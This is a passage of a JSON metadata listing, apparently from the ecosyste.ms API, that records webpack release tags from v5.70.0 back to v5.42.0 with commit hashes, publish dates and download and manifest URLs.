_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/